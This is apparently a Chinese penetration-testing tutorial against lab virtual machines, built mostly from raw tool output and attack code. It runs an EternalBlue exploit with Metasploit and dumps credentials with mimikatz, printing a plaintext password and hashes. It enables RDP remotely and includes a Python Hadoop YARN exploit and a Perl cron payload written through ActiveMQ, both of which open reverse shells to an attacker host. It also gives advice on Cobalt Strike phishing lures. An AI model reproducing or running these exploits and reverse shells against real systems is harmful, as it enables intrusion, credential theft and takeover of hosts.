00:1C:42:F4:4F:FE (Parallels)
Read data files from: /usr/local/bin/../share/nmapNmap done: 1 IP address (1 host up) scanned in 41.79 seconds Raw packets sent: 69291 (3.049MB) | Rcvd: 65536 (2.621MB)

经过端口开放状况可判断该主机为Windows操做系统，查看主机操做系统版本

(base) ➜ ~ sudo nmap -O 10.211.55.5Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:40 CSTNmap scan report for windows-10.shared (10.211.55.5)Host is up (0.00022s latency).Not shown: 997 closed portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-dsMAC Address: 00:1C:42:F4:4F:FE (Parallels)Device type: general purposeRunning (JUST GUESSING): Microsoft Windows Longhorn|10|2008|7|Vista|8.1 (94%)OS CPE: cpe:/o:microsoft:windows cpe:/o:microsoft:windows_10:1703 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_8.1Aggressive OS guesses: Microsoft Windows Longhorn (94%), Microsoft Windows 10 1703 (92%), Microsoft Windows 10 1511 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 SP2 (91%), Microsoft Windows 7 SP1 (91%), Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows 8 (91%), Microsoft Windows 10 1607 (91%), Microsoft Windows Vista SP1 (90%)No exact OS matches for host (test conditions non-ideal).Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 5.43 seconds

10.211.55.6

端口扫描

(base) ➜ ~ sudo nmap -sS -p 1-65535 -v 10.211.55.6Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:41 CSTInitiating ARP Ping Scan at 19:41Scanning 10.211.55.6 [1 port]Completed ARP Ping Scan at 19:41, 0.00s elapsed (1 total hosts)Initiating SYN Stealth Scan at 19:41Scanning ubuntu-linux20.04.shared (10.211.55.6) [65535 ports]Discovered open port 22/tcp on 10.211.55.6Discovered open port 61616/tcp on 10.211.55.6Discovered open port 8161/tcp on 10.211.55.6Discovered open port 8088/tcp on 10.211.55.6Completed SYN Stealth Scan at 19:41, 0.55s elapsed (65535 total ports)Nmap scan report for ubuntu-linux20.04.shared (10.211.55.6)Host is up (0.000046s latency).Not shown: 65531 closed portsPORT STATE SERVICE22/tcp open ssh8088/tcp open radan-http8161/tcp open patrol-snmp61616/tcp open unknownMAC Address: 00:1C:42:B7:60:2B (Parallels)
Read data files from: /usr/local/bin/../share/nmapNmap done: 1 IP address (1 host up) scanned in 0.61 seconds Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

操做系统识别

(base) ➜ ~ sudo nmap -O 10.211.55.6 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:42 CSTNmap scan report for ubuntu-linux20.04.shared (10.211.55.6)Host is up (0.00019s latency).Not shown: 998 closed portsPORT STATE SERVICE22/tcp open ssh8088/tcp open radan-httpMAC Address: 00:1C:42:B7:60:2B (Parallels)No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).TCP/IP fingerprint:OS:SCAN(V=7.80%E=4%D=8/8%OT=22%CT=1%CU=37942%PV=Y%DS=1%DC=D%G=Y%M=001C42%TMOS:=5F2E8FA2%P=x86_64-apple-darwin19.0.0)SEQ(SP=101%GCD=1%ISR=10D%TI=Z%CI=ZOS:%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11OS:NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FEOS:88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=4OS:0%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%OOS:=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40OS:%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%QOS:=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=YOS:%DFI=N%T=40%CD=S)
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 12.23 seconds

10.211.55.8

端口扫描

(base) ➜ ~ sudo nmap -sS -p 1-65535 -v 10.211.55.8Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:43 CSTInitiating ARP Ping Scan at 19:43Scanning 10.211.55.8 [1 port]Completed ARP Ping Scan at 19:43, 0.00s elapsed (1 total hosts)Initiating SYN Stealth Scan at 19:43Scanning windows-7sp1.shared (10.211.55.8) [65535 ports]Discovered open port 445/tcp on 10.211.55.8Discovered open port 135/tcp on 10.211.55.8Discovered open port 139/tcp on 10.211.55.8Discovered open port 49157/tcp on 10.211.55.8Discovered open port 49156/tcp on 10.211.55.8Discovered open port 49153/tcp on 10.211.55.8Discovered open port 49155/tcp on 10.211.55.8Discovered open port 49154/tcp on 10.211.55.8Discovered open port 49152/tcp on 10.211.55.8Completed SYN Stealth Scan at 19:44, 40.56s elapsed (65535 total ports)Nmap scan report for windows-7sp1.shared (10.211.55.8)Host is up (0.00010s latency).Not shown: 65526 closed portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds49152/tcp open unknown49153/tcp open unknown49154/tcp open unknown49155/tcp open unknown49156/tcp open unknown49157/tcp open unknownMAC Address: 00:1C:42:B2:9C:23 (Parallels)
Read data files from: /usr/local/bin/../share/nmapNmap done: 1 IP address (1 host up) scanned in 40.63 seconds Raw packets sent: 69424 (3.055MB) | Rcvd: 65537 (2.622MB)

操做系统识别

sudo nmap -O 10.211.55.8 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:44 CSTNmap scan report for windows-7sp1.shared (10.211.55.8)Host is up (0.00017s latency).Not shown: 991 closed portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds49152/tcp open unknown49153/tcp open unknown49154/tcp open unknown49155/tcp open unknown49156/tcp open unknown49157/tcp open unknownMAC Address: 00:1C:42:B2:9C:23 (Parallels)Device type: general purposeRunning: Microsoft Windows 7|2008|8.1OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 2.78 seconds

Goby

由于Goby扫描发包速率设置最大，运行会断网，影响网络使用，不作展现，仅做示意操做。

收集客户公司信息

企查查

www.qichacha.com

门户网站

在这个场景下假设咱们收集到了客户公司的邮箱。

漏洞利用

通过前期信息收集，可得出如下判断

10.211.55.5和10.211.55.8均为Windows操做系统。

Windows操做系统开放了

10.211.55.5PORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds5040/tcp open unknown49664/tcp open unknown49665/tcp open unknown49666/tcp open unknown49667/tcp open unknown49668/tcp open unknown49669/tcp open unknown49671/tcp open unknown
10.211.55.8PORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds49152/tcp open unknown49153/tcp open unknown49154/tcp open unknown49155/tcp open unknown49156/tcp open unknown49157/tcp open unknown

在作渗透测试的时候，一个shell对话只作一类事，端口扫描的shell不要用来作漏洞检测和利用。方便把日志导出为文本交给客户。

根据开放的445端口可初步肯定存在MS17-010永恒之蓝漏洞

对漏洞进行验证和利用，使用Metasploit里对payload进行验证。

通过验证，10.211.55.5不存在ms17-010漏洞

通过验证，10.211.55.8存在ms17-010漏洞，使用exploit进行攻击。

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.211.55.8rhosts => 10.211.55.8msf5 exploit(windows/smb/ms17_010_eternalblue) > set rport 445rport => 445msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.1.2:4444 [*] 10.211.55.8:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check[+] 10.211.55.8:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)[*] 10.211.55.8:445 - Scanned 1 of 1 hosts (100% complete)[*] 10.211.55.8:445 - Connecting to target for exploitation.[+] 10.211.55.8:445 - Connection established for exploitation.[+] 10.211.55.8:445 - Target OS selected valid for OS indicated by SMB reply[*] 10.211.55.8:445 - CORE raw buffer dump (38 bytes)[*] 10.211.55.8:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima[*] 10.211.55.8:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service [*] 10.211.55.8:445 - 0x00000020 50 61 63 6b 20 31 Pack 1 [+] 10.211.55.8:445 - Target arch selected valid for arch indicated by DCE/RPC reply[*] 10.211.55.8:445 - Trying exploit with 12 Groom Allocations.[*] 10.211.55.8:445 - Sending all but last fragment of exploit packet[*] 10.211.55.8:445 - Starting non-paged pool grooming[+] 10.211.55.8:445 - Sending SMBv2 buffers[+] 10.211.55.8:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.[*] 10.211.55.8:445 - Sending final SMBv2 buffers.[*] 10.211.55.8:445 - Sending last fragment of exploit packet![*] 10.211.55.8:445 - Receiving response from exploit packet[+] 10.211.55.8:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)![*] 10.211.55.8:445 - Sending egg to corrupted connection.[*] 10.211.55.8:445 - Triggering free of corrupted buffer.[*] Sending stage (201283 bytes) to 192.168.1.2[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.2:49249) at 2020-08-08 20:00:18 +0800[+] 10.211.55.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+] 10.211.55.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+] 10.211.55.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >

抓取目标主机的帐号登陆密码：

C:\Windows\system32>ipconfig ipconfig
Windows IP Configuration

Ethernet adapter ???????? 2:
 Connection-specific DNS Suffix . : localdomain IPv6 Address. . . . . . . . . . . : fdb2:2c26:f4e4:0:7002:eaf9:c043:7b1b Temporary IPv6 Address. . . . . . : fdb2:2c26:f4e4:0:cde9:7d52:8c02:9037 Link-local IPv6 Address . . . . . : fe80::7002:eaf9:c043:7b1b%14 IPv4 Address. . . . . . . . . . . : 10.211.55.8 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : fe80::21c:42ff:fe00:18%14 10.211.55.1
Tunnel adapter isatap.localdomain:
 Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : localdomain

C:\Windows\system32>systeminfosysteminfo
Host Name: RETURN0FA54OS Name: Microsoft Windows 7 Ultimate OS Version: 6.1.7601 Service Pack 1 Build 7601OS Manufacturer: Microsoft CorporationOS Configuration: Standalone WorkstationOS Build Type: Multiprocessor FreeRegistered Owner: return0;Registered Organization: Product ID: 00426-384-1216344-06000Original Install Date: 2020/7/13, 1:45:07System Boot Time: 2020/8/8, 14:45:29System Manufacturer: Parallels Software International Inc.System Model: Parallels Virtual PlatformSystem Type: x64-based PCProcessor(s): 1 Processor(s) Installed. [01]: Intel64 Family 6 Model 158 Stepping 13 GenuineIntel ~2400 MhzBIOS Version: Parallels Software International Inc. 15.1.4 (47270), 2020/4/13Windows Directory: C:\WindowsSystem Directory: C:\Windows\system32Boot Device: \Device\HarddiskVolume1System Locale: zh-cn;Chinese (China)Input Locale: en-us;English (United States)Time Zone: N/ATotal Physical Memory: 4,096 MBAvailable Physical Memory: 3,313 MBVirtual Memory: Max Size: 8,189 MBVirtual Memory: Available: 7,308 MBVirtual Memory: In Use: 881 MBPage File Location(s): C:\pagefile.sysDomain: WORKGROUPLogon Server: N/AHotfix(s): 2 Hotfix(s) Installed. [01]: KB2534111 [02]: KB976902Network Card(s): 1 NIC(s) Installed. [01]: Parallels Ethernet Adapter Connection Name: 本地链接 2 DHCP Enabled: Yes DHCP Server: 10.211.55.1 IP address(es) [01]: 10.211.55.8 [02]: fe80::7002:eaf9:c043:7b1b [03]: fdb2:2c26:f4e4:0:cde9:7d52:8c02:9037 [04]: fdb2:2c26:f4e4:0:7002:eaf9:c043:7b1b

通过对目标主机信息收集，发现目标主机系统为64位，上传64位mimikatz.exe进行密码抓取。

mimikatz # sekurlsa::logonPasswords
Authentication Id : 0 ; 73647 (00000000:00011faf)Session : Interactive from 1User Name : return0Domain : RETURN0FA54Logon Server : RETURN0FA54Logon Time : 2020/8/8 14:45:41SID : S-1-5-21-2676871807-2807053931-1165176819-1000 msv :  [00000003] Primary * Username : return0 * Domain : RETURN0FA54 * LM : b47f9a39939fbe2e3cfeb463bfee415c * NTLM : 52dec73c7fb089d8917fbdf7985b6036 * SHA1 : f072ae3248a49934bd3d472cdf8ffcaffa74f7bf tspkg :  * Username : return0 * Domain : RETURN0FA54 * Password : woshidashabi! wdigest :  * Username : return0 * Domain : RETURN0FA54 * Password : woshidashabi! kerberos :  * Username : return0 * Domain : RETURN0FA54 * Password : woshidashabi! ssp :  credman : 
Authentication Id : 0 ; 73594 (00000000:00011f7a)Session : Interactive from 1User Name : return0Domain : RETURN0FA54Logon Server : RETURN0FA54Logon Time : 2020/8/8 14:45:41SID : S-1-5-21-2676871807-2807053931-1165176819-1000 msv :  [00000003] Primary * Username : return0 * Domain : RETURN0FA54 * LM : b47f9a39939fbe2e3cfeb463bfee415c * NTLM : 52dec73c7fb089d8917fbdf7985b6036 * SHA1 : f072ae3248a49934bd3d472cdf8ffcaffa74f7bf tspkg :  * Username : return0 * Domain : RETURN0FA54 * Password : woshidashabi! wdigest :  * Username : return0 * Domain : RETURN0FA54 * Password : woshidashabi! kerberos :  * Username : return0 * Domain : RETURN0FA54 * Password : woshidashabi! ssp :  credman : 
Authentication Id : 0 ; 997 (00000000:000003e5)Session : Service from 0User Name : LOCAL SERVICEDomain : NT AUTHORITYLogon Server : (null)Logon Time : 2020/8/8 14:45:40SID : S-1-5-19 msv :  tspkg :  wdigest :  * Username : (null) * Domain : (null) * Password : (null) kerberos :  * Username : (null) * Domain : (null) * Password : (null) ssp :  credman : 
Authentication Id : 0 ; 996 (00000000:000003e4)Session : Service from 0User Name : RETURN0FA54$Domain : WORKGROUPLogon Server : (null)Logon Time : 2020/8/8 14:45:40SID : S-1-5-20 msv :  tspkg :  wdigest :  * Username : RETURN0FA54$ * Domain : WORKGROUP * Password : (null) kerberos :  * Username : return0fa54$ * Domain : WORKGROUP * Password : (null) ssp :  credman : 
Authentication Id : 0 ; 30280 (00000000:00007648)Session : UndefinedLogonType from 0User Name : (null)Domain : (null)Logon Server : (null)Logon Time : 2020/8/8 14:45:39SID :  msv :  tspkg :  wdigest :  kerberos :  ssp :  credman : 
Authentication Id : 0 ; 999 (00000000:000003e7)Session : UndefinedLogonType from 0User Name : RETURN0FA54$Domain : WORKGROUPLogon Server : (null)Logon Time : 2020/8/8 14:45:39SID : S-1-5-18 msv :  tspkg :  wdigest :  * Username : RETURN0FA54$ * Domain : WORKGROUP * Password : (null) kerberos :  * Username : return0fa54$ * Domain : WORKGROUP * Password : (null) ssp :  credman :

前期信息收集发现3389端口没开，没法进行登陆操做，使用命令进行3389端口开放操做。

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

咱们使用Nmap再次进行端口探测，可发现3389端口成功开启。

(base) ➜ ~ sudo nmap -O 10.211.55.8Password:Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 20:13 CSTNmap scan report for windows-7sp1.shared (10.211.55.8)Host is up (0.00018s latency).Not shown: 990 closed portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds3389/tcp open ms-wbt-server49152/tcp open unknown49153/tcp open unknown49154/tcp open unknown49155/tcp open unknown49156/tcp open unknown49157/tcp open unknownMAC Address: 00:1C:42:B2:9C:23 (Parallels)Device type: general purposeRunning: Microsoft Windows 7|2008|8.1OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 2.91 seconds

3389端口开启成功以后利用抓取到的密码进行远程登陆操做。

成功登陆Windows7SP1操做系统。

10.211.55.6为Ubuntu Linux

开放的端口为：

PORT STATE SERVICE22/tcp open ssh8088/tcp open radan-http8161/tcp open patrol-snmp61616/tcp open unknown

开放8088端口，Web应用，使用浏览器打开发现Hadoop未受权访问。

能够利用Hadoop未受权访问获取服务器权限。

反弹shell的exploit

# _*_ coding utf-8 _*_# author:return0;import requests
target = 'http://10.211.55.6:8088/' # 目标主机的IP地址lhost = '192.168.1.2' # 攻击机物理地址，监听端口是8888
url = target + 'ws/v1/cluster/apps/new-application'resp = requests.post(url)app_id = resp.json()['application-id']url = target + 'ws/v1/cluster/apps'data = { 'application-id': app_id, 'application-name': 'get-shell', 'am-container-spec': { 'commands': { 'command': '/bin/bash -i >& /dev/tcp/%s/8888 0>&1' % lhost, }, }, 'application-type': 'YARN',}requests.post(url, json=data)

监听8888端口

(base) ➜ ~ nc -l 8888bash: cannot set terminal process group (211): Inappropriate ioctl for devicebash: no job control in this shell<33412_0001/container_1596872533412_0001_01_000001# whoamiwhoamiroot<33412_0001/container_1596872533412_0001_01_000001# ifconfigifconfigeth0 Link encap:Ethernet HWaddr 02:42:ac:1a:00:02  inet addr:172.26.0.2 Bcast:172.26.255.255 Mask:255.255.0.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:17365 errors:0 dropped:0 overruns:0 frame:0 TX packets:34456 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0  RX bytes:1858357 (1.7 MiB) TX bytes:5760591 (5.4 MiB)
lo Link encap:Local Loopback  inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:8 errors:0 dropped:0 overruns:0 frame:0 TX packets:8 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000  RX bytes:647 (647.0 B) TX bytes:647 (647.0 B)
<33412_0001/container_1596872533412_0001_01_000001# ididuid=0(root) gid=0(root) groups=0(root)<33412_0001/container_1596872533412_0001_01_000001#

获取到Ubuntu Linux服务器权限

主机开放了8161端口，使用浏览器打开发现为ActiveMQ组件，存在任意文件写入漏洞。

PUT /fileserver/1.txt HTTP/1.1Host: 10.211.55.6:8161Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Length: 249
*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="192.168.1.2";$p=21;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'##

使用BurpSuite对网页数据进行抓包，改动数据包写马重放数据包，204表示成功。

将上传的马进行文件移动操做

MOVE /fileserver/1.txt HTTP/1.1 Destination: file:///etc/cron.d/root/1.txt Host: 10.211.55.6:8161 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 6
test

监听端口等待shell反弹便可。

针对Windows10须要使用CobaltStrike生成木马进行社工操做诱惑用户点击木马。

启动CobaltStrike服务器端

启动客户端

对生成对木马进行假装，对客户发送钓鱼邮件。

钓鱼邮件主题：要贴合客户业务范围，别瞎发驴唇不对马嘴。人家是能源业务，你发个电网业务相关邮件，是不会打开的。对生成的马要作免杀操做，免杀下次讲。

权限提高

渗透测试日志

端口扫描

Last login: Sat Aug 8 18:51:00 on ttys001(base) ➜ ~ Nmap -Pn 10.211.55.1/24Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:26 CSTNmap scan report for 10.211.55.0Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.0 are filtered
Nmap scan report for 10.211.55.1Host is up.All 1000 scanned ports on 10.211.55.1 are filtered
Nmap scan report for 10.211.55.2Host is up (0.0013s latency).All 1000 scanned ports on 10.211.55.2 are closed
Nmap scan report for 10.211.55.3Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.3 are filtered
Nmap scan report for 10.211.55.4Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.4 are filtered
Nmap scan report for windows-10.shared (10.211.55.5)Host is up (0.00068s latency).Not shown: 997 filtered portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds
Nmap scan report for ubuntu-linux20.04.shared (10.211.55.6)Host is up (0.00085s latency).Not shown: 998 filtered portsPORT STATE SERVICE22/tcp open ssh8088/tcp open radan-http
Nmap scan report for 10.211.55.7Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.7 are filtered
Nmap scan report for windows-7sp1.shared (10.211.55.8)Host is up (0.0011s latency).Not shown: 991 filtered portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds49152/tcp open unknown49153/tcp open unknown49154/tcp open unknown49155/tcp open unknown49156/tcp open unknown49157/tcp open unknown
Nmap scan report for 10.211.55.9Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.9 are filtered
Nmap scan report for 10.211.55.10Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.10 are filtered
Nmap scan report for 10.211.55.11Host is up (0.000026s latency).All 1000 scanned ports on 10.211.55.11 are filtered
Nmap scan report for 10.211.55.12Host is up (0.000029s latency).All 1000 scanned ports on 10.211.55.12 are filtered
Nmap scan report for 10.211.55.13Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.13 are filtered
Nmap scan report for 10.211.55.14Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.14 are filtered
Nmap scan report for 10.211.55.15Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.15 are filtered
Nmap scan report for 10.211.55.16Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.16 are filtered
Nmap scan report for 10.211.55.17Host is up (0.000027s latency).All 1000 scanned ports on 10.211.55.17 are filtered
Nmap scan report for 10.211.55.18Host is up (0.000027s latency).All 1000 scanned ports on 10.211.55.18 are filtered
Nmap scan report for 10.211.55.19Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.19 are filtered
Nmap scan report for 10.211.55.20Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.20 are filtered
Nmap scan report for 10.211.55.21Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.21 are filtered
Nmap scan report for 10.211.55.22Host is up (0.000017s latency).All 1000 scanned ports on 10.211.55.22 are filtered
Nmap scan report for 10.211.55.23Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.23 are filtered
Nmap scan report for 10.211.55.24Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.24 are filtered
Nmap scan report for 10.211.55.25Host is up (0.000019s latency).All 1000 scanned ports on 10.211.55.25 are filtered
Nmap scan report for 10.211.55.26Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.26 are filtered
Nmap scan report for 10.211.55.27Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.27 are filtered
Nmap scan report for 10.211.55.28Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.28 are filtered
Nmap scan report for 10.211.55.29Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.29 are filtered
Nmap scan report for 10.211.55.30Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.30 are filtered
Nmap scan report for 10.211.55.31Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.31 are filtered
Nmap scan report for 10.211.55.32Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.32 are filtered
Nmap scan report for 10.211.55.33Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.33 are filtered
Nmap scan report for 10.211.55.34Host is up (0.000017s latency).All 1000 scanned ports on 10.211.55.34 are filtered
Nmap scan report for 10.211.55.35Host is up (0.000019s latency).All 1000 scanned ports on 10.211.55.35 are filtered
Nmap scan report for 10.211.55.36Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.36 are filtered
Nmap scan report for 10.211.55.37Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.37 are filtered
Nmap scan report for 10.211.55.38Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.38 are filtered
Nmap scan report for 10.211.55.39Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.39 are filtered
Nmap scan report for 10.211.55.40Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.40 are filtered
Nmap scan report for 10.211.55.41Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.41 are filtered
Nmap scan report for 10.211.55.42Host is up (0.000017s latency).All 1000 scanned ports on 10.211.55.42 are filtered
Nmap scan report for 10.211.55.43Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.43 are filtered
Nmap scan report for 10.211.55.44Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.44 are filtered
Nmap scan report for 10.211.55.45Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.45 are filtered
Nmap scan report for 10.211.55.46Host is up (0.000017s latency).All 1000 scanned ports on 10.211.55.46 are filtered
Nmap scan report for 10.211.55.47Host is up (0.000035s latency).All 1000 scanned ports on 10.211.55.47 are filtered
Nmap scan report for 10.211.55.48Host is up (0.000029s latency).All 1000 scanned ports on 10.211.55.48 are filtered
Nmap scan report for 10.211.55.49Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.49 are filtered
Nmap scan report for 10.211.55.50Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.50 are filtered
Nmap scan report for 10.211.55.51Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.51 are filtered
Nmap scan report for 10.211.55.52Host is up (0.000016s latency).All 1000 scanned ports on 10.211.55.52 are filtered
Nmap scan report for 10.211.55.53Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.53 are filtered
Nmap scan report for 10.211.55.54Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.54 are filtered
Nmap scan report for 10.211.55.55Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.55 are filtered
Nmap scan report for 10.211.55.56Host is up (0.000017s latency).All 1000 scanned ports on 10.211.55.56 are filtered
Nmap scan report for 10.211.55.57Host is up (0.000028s latency).All 1000 scanned ports on 10.211.55.57 are filtered
Nmap scan report for 10.211.55.58Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.58 are filtered
Nmap scan report for 10.211.55.59Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.59 are filtered
Nmap scan report for 10.211.55.60Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.60 are filtered
Nmap scan report for 10.211.55.61Host is up (0.000035s latency).All 1000 scanned ports on 10.211.55.61 are filtered
Nmap scan report for 10.211.55.62Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.62 are filtered
Nmap scan report for 10.211.55.63Host is up (0.000026s latency).All 1000 scanned ports on 10.211.55.63 are filtered
Nmap scan report for 10.211.55.64Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.64 are filtered
Nmap scan report for 10.211.55.65Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.65 are filtered
Nmap scan report for 10.211.55.66Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.66 are filtered
Nmap scan report for 10.211.55.67Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.67 are filtered
Nmap scan report for 10.211.55.68Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.68 are filtered
Nmap scan report for 10.211.55.69Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.69 are filtered
Nmap scan report for 10.211.55.70Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.70 are filtered
Nmap scan report for 10.211.55.71Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.71 are filtered
Nmap scan report for 10.211.55.72Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.72 are filtered
Nmap scan report for 10.211.55.73Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.73 are filtered
Nmap scan report for 10.211.55.74Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.74 are filtered
